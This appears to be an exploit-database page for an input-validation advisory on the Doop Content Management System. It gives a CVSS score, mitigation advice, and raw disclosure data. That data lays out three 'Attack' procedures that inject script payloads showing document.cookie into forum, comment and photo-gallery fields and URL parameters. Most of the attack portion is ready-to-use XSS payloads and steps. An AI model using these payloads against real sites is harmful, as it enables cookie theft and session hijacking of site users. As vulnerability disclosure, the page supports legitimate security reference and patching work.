header-logo
Suggest Exploit
vendor:
Doop Content Management System
by:
7.5
CVSS
HIGH
Input Validation
CWE
Product Name: Doop Content Management System
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Doop Content Management System Multiple Input-Validation Vulnerabilities

The Doop Content Management System is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, control how the site is rendered to the user, compromise the application, obtain sensitive information, and access or modify data.

Mitigation:

Implement strict input validation and sanitization techniques to prevent malicious input from being processed. Regularly update the Doop Content Management System to ensure that any security patches or fixes are applied.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23482/info

Doop Content Management System is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, control how the site is rendered to the user, compromise the application, obtain sensitive information, and access or modify data. 

Attack 1 :

http://www.example.com/path/index.php?page=forum

New/Reply Topic :

Title: 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>
Text: <script>alert(document.cookie);</script><script>alert(/xss/);</script>
Name or nick: 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>
e-mail: 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>

send.
and refresh page ..

Attack 2 :

http://www.example.com/path/?page=vdasCMS

New Comment: 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>
Name: <script>alert(document.cookie);</script><script>alert(/xss/);</script>
Email: 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>
Text: <script>alert(document.cookie);</script><script>alert(/xss/);</script>

send.
and refresh page ..

Attack 3 :

in photogallery page

http://www.example.com/path/index.php?page=photos

http://www.example.com/path/index.php?page=[XSS] example : 
<script>alert(document.cookie);</script><script>alert(/xss/);</script>